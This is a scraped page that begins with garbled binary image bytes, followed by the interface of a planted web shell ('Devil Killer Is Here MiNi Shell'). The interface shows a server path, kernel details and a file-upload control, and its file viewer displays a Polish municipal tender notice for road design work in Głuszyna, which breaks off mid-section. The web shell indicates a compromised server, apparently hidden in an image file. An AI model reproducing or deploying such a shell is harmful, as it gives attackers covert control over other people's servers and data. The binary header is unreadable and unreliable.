JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20230510/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20230510/0020945401-N-2023.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Usługi<br/> Budowa ul. Długiej w Głuszynie - opracowanie dokumentacji projektowej </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Gmina Namysłów, reprezentowana przez Burmistrza Namysłowa</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 531413159</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Stanisława Dubois 3</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Namysłów</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">46-100</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">zamowienia@namyslow.eu</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.bip.namyslow.eu</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - organ władzy publicznej - organ administracji rządowej (centralnej lub terenowej)</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Ogólne usługi publiczne</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Budowa ul. Długiej w Głuszynie - opracowanie dokumentacji projektowej </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-b0a3fe21-ef21-11ed-9355-06954b8c6cb9</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2023/BZP 00209454</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2023-05-10</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2023/BZP 00075012/07/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.3.10 Budowa ul. Długiej w Głuszynie - opracowanie dokumentacji projektowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> www.bip.namyslow.eu; https://namyslow.ezamawiajacy.pl/app/login <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://namyslow.ezamawiajacy.pl/app/login</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne<br/>zgodnie z punktem 8 i 12 SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">Zgodnie z art. 13 ust. 1 i 2 Rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie<br/>swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólne rozporządzenie o ochronie danych) (Dz. Urz. UE<br/>L 119 z dnia 04.05.2016 r., str. 1), dalej „RODO”, informuję, że: 􀀀 administratorem Pani/Pana danych osobowych jest Gmina<br/>Namysłów reprezentowana przez Burmistrza Namysłowa, z którym można się skontaktować poprzez: korespondencyjnie: ul.<br/>Stanisława Dubois 3, 46-100 Namysłów, adres e-mail: urzad.miejski@namyslow.eu, numer telefonu +48 77 41 90 300;<br/>􀀀 inspektorem ochrony danych osobowych w Gminie Namysłów jest Pan Wojciech Olender z którym można się skontaktować<br/>poprzez: korespondencyjnie: ul. Stanisława Dubois 3, 46-100 Namysłów, adres e-mail: iod@namyslow.eu, numer telefonu 887 818<br/>800;􀀀 Pani/Pana dane osobowe przetwarzane będą na podstawie art. 6 ust. 1 lit. C RODO w celu związanym z postępowaniem o<br/>udzielenie zamówienia publicznego na „Budowa ul. Długiej w Głuszynie – opracowanie dokumentacji projektowej”, nr<br/>P.271.90.2023.KK, prowadzonym w trybie podstawowym (art. 275 pkt 1 ustawy Pzp);<br/>􀀀 odbiorcami Pani/Pana danych osobowych będą osoby lub podmioty, którym udostępniona zostanie dokumentacja postępowania w<br/>oparciu o art. 18 oraz art. 74 ustawy z dnia 11 września 2019 r – Prawo zamówień publicznych (Dz. U. z 2022 r., poz. 1710, z późn.<br/>zm.); 􀀀 Pani/Pana dane osobowe będą przechowywane, zgodnie z art. 78 ust. 1 ustawy Pzp, przez okres<br/>co najmniej 7 lat od dnia wpływu ostatniej płatności na konto beneficjenta (płatności na realizację projektu), a jeżeli zobowiązania<br/>wskazane w ofercie i umowie przekroczą w/w przedział czasowy, okres przechowywania obejmuje ten termin; 􀀀 obowiązek podania<br/>przez Panią/Pana danych osobowych bezpośrednio Pani/Pana dotyczących jest wymogiem ustawowym określonym w przepisach<br/>ustawy Pzp, związanym z udziałem<br/>w postępowaniu o udzielenie zamówienia publicznego; konsekwencje niepodania określonych danych wynikają z ustawy Pzp;<br/>􀀀 w odniesieniu do Pani/Pana danych osobowych decyzje nie będą podejmowane w sposób zautomatyzowany, stosownie do art. 22<br/>RODO;<br/>􀀀 posiada Pani/Pan:  na podstawie art. 15 RODO prawo dostępu do danych osobowych Pani/Pana dotyczących;  na podstawie art.<br/>16 RODO prawo do sprostowania Pani/Pana danych osobowych (skorzystanie z prawa do sprostowania nie może skutkować<br/>zmianą wyniku postępowania<br/>o udzielenie zamówienia publicznego ani zmianą postanowień umowy w zakresie niezgodnym z ustawą Pzp oraz nie może naruszać<br/>integralności protokołu oraz jego załączników);  na podstawie art. 18 RODO prawo żądania od administratora ograniczenia<br/>przetwarzania danych osobowych z zastrzeżeniem przypadków, o których mowa w art. 18 ust. 2 RODO (prawo do ograniczenia<br/>przetwarzania nie ma zastosowania w odniesieniu do przechowywania, w celu zapewnienia korzystania ze środków ochrony prawnej<br/>lub w celu ochrony praw innej osoby fizycznej lub prawnej, lub z uwagi na ważne względy interesu publicznego Unii Europejskiej lub<br/>państwa członkowskiego);  prawo do wniesienia skargi do Prezesa Urzędu Ochrony Danych Osobowych, gdy uzna Pani/Pan, że<br/>przetwarzanie danych osobowych Pani/Pana dotyczących narusza przepisy RODO; 􀀀 nie przysługuje Pani/Panu:<br/> w związku z art. 17 ust. 3 lit. b, d lub e RODO prawo do usunięcia danych osobowych;  prawo do przenoszenia danych osobowych,<br/>o których mowa w art. 20 RODO;  na podstawie art. 21 RODO prawo sprzeciwu, wobec przetwarzania danych osobowych, gdyż<br/>podstawą prawną przetwarzania Pani/Pana danych osobowych jest art. 6 ust. 1 lit. c RODO. Pozostałe informacje zostały zawarte w<br/>punkcie 20 dodatkowych postanowień SWZ.</span></h3> <h3 class="mb-0">3.16.) RODO (ograniczenia stosowania): <span class="normal">Pozostałe informacje zostały zawarte w punkcie 20 dodatkowych postanowień SWZ.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZP.271.90.2023.KK</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Usługi</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">4.1.14.) Określenie aspektów społecznych, środowiskowych lub etykiet w opisie przedmiotu zamówienia: </h3> <p class="mb-0">Zamawiający uwzględnił wymagania w zakresie dostępności dla osób niepełnosprawnych oraz projektowania z przeznaczeniem dla wszystkich użytkowników, zgodnie z art. 100 ust. 1 ustawy</p> <p class="mb-0">Zamawiający określił wymagania dotyczące wydajności lub funkcjonalności, zgodnie z art. 101 ust. 1 ustawy</p><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Przedmiotem zamówienia jest opracowanie dokumentacji projektowej budowy drogi gminnej ul. Długiej (z bocznymi) w<br/>miejscowości Głuszyna wraz z odwodnieniem i oświetleniem oraz niezbędną infrastrukturą techniczną, a także zjazdami do<br/>dróg powiatowych, stanowiącej załącznik do wniosku o zatwierdzenie projektu i uzyskanie zezwolenie na realizację<br/>inwestycji drogowej. Lokalizacja: Głuszyna, gmina Namysłów, powiat namysłowski, województwo opolskie, działki nr 329,<br/>39/2, 40/2, 41/2, 328/5, 42/2, 328/6, 328/9, 43/2, 328/3, 328/1, 345, 911 i 914. Długość odcinka drogi do zaprojektowania –<br/>ok. 5,04 km. Miejscowość Głuszyna posiada miejscowy plan zagospodarowania przestrzennego – Uchwała Nr 477/VIII/21<br/>Rady Miejskiej w Namysłowie z dnia 30 grudnia 2021 r. w sprawie uchwalenia zmiany miejscowego planu<br/>zagospodarowania przestrzennego wsi Głuszyna i Brzezinki. Uchwała na stronie www.namyslow.eu zakładka „SYSTEM<br/>INFORMACJI PRZESTRZENNEJ” lub BIP w wykazie uchwał Rady Miejskiej.<br/>Pasy drogowe oznaczone wg rysunku planu zagospodarowania przestrzennego stanowią własność Gminy Namysłów i<br/>osób prywatnych.<br/>Dokumenty i materiały niezbędne do wykonania przedmiotu zamówienia Wykonawca zorganizuje we własnym zakresie, a<br/>ich koszt uwzględni w cenie oferty. Zakres przedmiotu zamówienia obejmuje w szczególności:<br/>• uzyskanie wszelkich informacji niezbędnych do prawidłowego procesu projektowego, • uzyskanie mapy do celów<br/>projektowych, w zakresie umożliwiającym odwodnienie projektowanej drogi, • uzyskanie niezbędnych pozwoleń, uzgodnień i<br/>opinii do realizacji inwestycji, w tym: pozwolenia wodnoprawnego, decyzji o środowiskowych uwarunkowaniach zgody na<br/>realizację przedsięwzięcia, zezwolenia na usunięcie drzew i/lub krzewów itp., o ile będą wymagane, • przygotowanie danych<br/>do opracowania podziałów nieruchomości, • sporządzenie i podpisanie umów użyczenia z właścicielami terenów<br/>prywatnych, • uzyskanie potrzebnych warunków technicznych i uzgodnień niezbędnych do złożenia kompletnego wniosku o<br/>zatwierdzenie projektu i uzyskania decyzji zezwalającej na realizację inwestycji drogowej,<br/>• wykonanie badań geotechnicznych – min. 20 odwiertów, • sporządzenia projektu zagospodarowania terenu (działki), •<br/>sporządzenie głównych rzutów, ewentualnie innych niezbędnych szkiców i rysunków przedstawiających przyjęte<br/>rozwiązania projektowe, • opracowanie w programie komputerowym kompletnej dokumentacji budowlanej wszystkich branż,<br/>w czterech egzemplarzach w formie papierowej, w jednym egzemplarzu w formie elektronicznej na płycie CD-R w formacie<br/>WORD lub PDF i w jednym egzemplarzu w formie edytowalnej w formacie dwg lub podobnym, • opracowanie w programie<br/>komputerowym kompletnej dokumentacji wykonawczej wszystkich branż, w czterech egzemplarzach w formie papierowej, w<br/>jednym egzemplarzu w formie elektronicznej<br/>na płycie CD-R w formacie WORD lub PDF i w jednym egzemplarzu w formie edytowalnej w formacie dwg lub podobnym, •<br/>opracowanie kosztorysu inwestorskiego i przedmiaru robót zgodnie z aktualnie obowiązującymi przepisami prawa i<br/>przekazanie ich Zamawiającemu w dwóch egzemplarzach w formie papierowej oraz jednego egzemplarza w formie<br/>elektronicznej na płycie CD-R w dwóch wersjach: nieedytowalnej w formacie PDF oraz edytowalnej programie NORMA –<br/>osobno dla każdego etapu,<br/>• opracowanie specyfikacji technicznych wykonania i odbioru robót budowlanych zgodnie z aktualnie obowiązującymi<br/>przepisami prawa i przekazanie ich Zamawiającemu w trzech egzemplarzach w formie papierowej oraz jednego<br/>egzemplarza w formie elektronicznej na płycie CD-R w dwóch wersjach: nieedytowalnej w formacie PDF oraz edytowalnej w<br/>programie WORD – osobno dla każdego etapu, • opracowanie kompletnego projektu docelowej organizacji ruchu zgodnie z<br/>aktualnie obowiązującymi przepisami prawa i przekazanie go Zamawiającemu w dwóch egzemplarzach w formie papierowej<br/>oraz jednego egzemplarza w formie elektronicznej na płycie CD-R w dwóch wersjach: nieedytowalnej w formacie PDF oraz<br/>edytowalnej w formacie plików tekstowych w programie WORD i plików projektowych w formacie PDF – osobno dla każdego<br/>etapu,<br/>• uzyskanie zatwierdzenia stałej docelowej organizacji ruchu w stosownym organie, • uzyskanie zezwolenia na realizację<br/>inwestycji drogowej.<br/>Uwagi! Na podstawie danych Wykonawcy, Zamawiający opracuje podziały nieruchomości i uzyska decyzje podziałów<br/>nieruchomości oraz poniesie z tego tytuły koszty (nie należy ujmować tych kosztów w cenie oferty).Konstrukcję jezdni<br/>należy zaprojektować na obciążenie powyżej 3,5 Mg o nawierzchni z betonu asfaltowego. Oświetlenie drogowe w postaci<br/>latarni z oprawami typu LED. Drogi planuje się odwodnić do istniejących rowów melioracyjnych za pomocą rowów<br/>przydrożnych. W miejscach rowów przydrożnych należy zaprojektować zjazdy do każdej nieruchomości. Wykonawca<br/>zobowiązany jest do uzgadniania z Zamawiającym przyjęte rozwiązania funkcjonalne, materiałowe i kosztowe. Wykonawca<br/>zobowiązany jest w ramach ceny ofertowej do udziału w dwóch zorganizowanych spotkaniach z mieszkańcami w zakresie<br/>przyjętych rozwiązań projektowych. Dokumentacja projektowa nie może naruszać praw autorskich innych osób lub<br/>podmiotów, w tym również musi być wolna od innych wad prawnych i fizycznych, które mogłyby spowodować<br/>Ogłoszenie nr 2023/BZP 00151682/01 z dnia 2023-03-27<br/>2023-03-27 Biuletyn Zamówień Publicznych Ogłoszenie o zamówieniu - Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy - Usługi<br/>odpowiedzialność Zamawiającego. Forma elektroniczna przedmiotu zamówienia musi być tak przygotowana, aby<br/>Zamawiający miał możliwość zamieszczenia opracowań na stronie internetowej, jako załącznik do Specyfikacji Warunków<br/>Zamówienia na wykonanie robót budowlanych na podstawie sporządzonej dokumentacji. Wykonawca zobowiązany jest w<br/>ramach ceny ofertowej do sprawowania nadzoru autorskiego podczas realizacji zadania oraz udziału w radach budowy, w<br/>terminach ustalonych z Zamawiającym. Wykonawca będzie pełnił nadzór autorski oraz brał udział w radach budowy na<br/>żądanie Zamawiającego. Nadzór autorski sprawowany przez Wykonawcę będzie obejmował w szczególności: •<br/>stwierdzenie w toku wykonywanych robót zgodności robót budowlanych z opracowanym projektem, • wyjaśnienie<br/>wątpliwości dotyczących projektu i zawartych w nim rozwiązań oraz uzupełnianie szczegółów dokumentacji projektowej,<br/>• uzgadnianie z Zamawiającym i Wykonawcą robót realizowanych na podstawie projektu możliwości wprowadzenia<br/>rozwiązań zamiennych w stosunku do przewidzianych w projekcie w odniesieniu do materiałów i konstrukcji oraz rozwiązań<br/>technicznych i technologicznych, • udział w komisjach i naradach technicznych organizowanych przez Zamawiającego.<br/>Usuwanie braków lub błędów w dokumentacji nie stanowi nadzoru autorskiego, lecz będzie wykonywane w ramach<br/>odpowiedzialności Wykonawcy za należyte wykonanie dokumentacji projektowo-kosztorysowej.<br/>Wykonawca otrzyma od Zamawiającego pełnomocnictwo do występowania w imieniu Zamawiającego w procesie<br/>projektowym. Dokumentacja projektowa musi zawierać informację czy w opisie przedmiotu zamówienia<br/>są uwzględnione aspekty społeczne, środowiskowe lub etykiety zgodnie z art. 100 ust. 1, 101 ust. 1i 104 ustawy z dnia 11<br/>września 2019 r. Prawo zamówień publicznych (Dz. U. z 2022 r. poz. 1710 z późn. zm.). W dokumentacji projektowej należy<br/>uwzględniać wymogi w zakresie dostępności dla osób z niepełnosprawnościami. Przedmiot zamówienia należy wykonać w<br/>szczególności zgodnie z: opisem przedmiotu zamówienia, określonym w tej specyfikacji,  ustawą z dnia 7 lipca 1994 r.<br/>Prawo budowlane (Dz. U. z 2021 r. poz. 2351, z późn. zm.),  ustawą z dnia 21 marca 1981 r. o drogach publicznych (Dz. U.<br/>z 2022 r. poz. 1693, z późn. zm.), rozporządzeniem Ministra Rozwoju z dnia 11 września 2020 r. w sprawie szczegółowego<br/>zakresu i formy projektu budowlanego (Dz. U. z 2022 r. poz. 1679),<br/> rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie szczegółowego zakresu i formy<br/>dokumentacji projektowej, specyfikacji technicznych wykonania i odbioru robót budowlanych oraz programu funkcjonalnoużytkowego<br/>(Dz. U. z 2021 r. poz. 2454),<br/> rozporządzeniem Ministra Rozwoju i Technologii z dnia 20 grudnia 2021 r. w sprawie określenia metod i podstaw<br/>sporządzania kosztorysu inwestorskiego, obliczania planowanych kosztów prac projektowych oraz planowanych kosztów<br/>robót budowlanych określonych w programie funkcjonalno-użytkowym (Dz. U. z 2021 r. poz. 2458),<br/> rozporządzeniem Ministra Transportu i Gospodarki Morskiej z dnia 2 marca 1999 r. w sprawie warunków technicznych,<br/>jakim powinny odpowiadać drogi publiczne i ich usytuowanie (Dz. U. z 2016 r. poz. 124, z późn. zm.)<br/> rozporządzeniem Ministrów Infrastruktury oraz Spraw Wewnętrznych i Administracji z dnia 31 lipca 2002 r. w sprawie<br/>znaków i sygnałów drogowych (Dz. U. z 2019 r. poz. 2310),  wszelkimi niezbędnymi przepisami z zakresu prawa<br/>budowlanego, bezpieczeństwa i higieny pracy oraz ochrony przeciwpożarowej, ochrony środowiska i obowiązującymi<br/>standardami, obowiązującymi Polskimi Normami oraz zasadami współczesnej wiedzy technicznej. Powody niedokonania<br/>podziału zamówienia na części: nadmierne trudności techniczne, nadmierne koszty wykonania zamówienia oraz trudności<br/>skoordynowania działań różnych Wykonawców realizujących poszczególne części zamówienia, które mogłyby poważnie<br/>zagrozić właściwemu wykonaniu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71320000-7 - Usługi inżynieryjne w zakresie projektowania</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">180 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Procentowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Ilość pobytów na budowie, radzie budowy</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">W celu potwierdzenia braku<br/>podstaw do wykluczenia Wykonawcy z udziału w postępowaniu: - na podstawie § 3 Rozporządzenia Ministra Rozwoju, Pracy i<br/>Technologii z dnia 23 grudnia 2020 r. w sprawie podmiotowych środków dowodowych oraz innych dokumentów lub oświadczeń,<br/>jakich może żądać Zamawiający od Wykonawcy (Dz. U. z 2020 r., poz. 2415), Zamawiający żąda oświadczenia Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu, o którym mowa w pkt 3.1. SWZ, w zakresie podstaw wykluczenia z postępowania<br/>wskazanych przez Zamawiającego. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i aktualność.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - 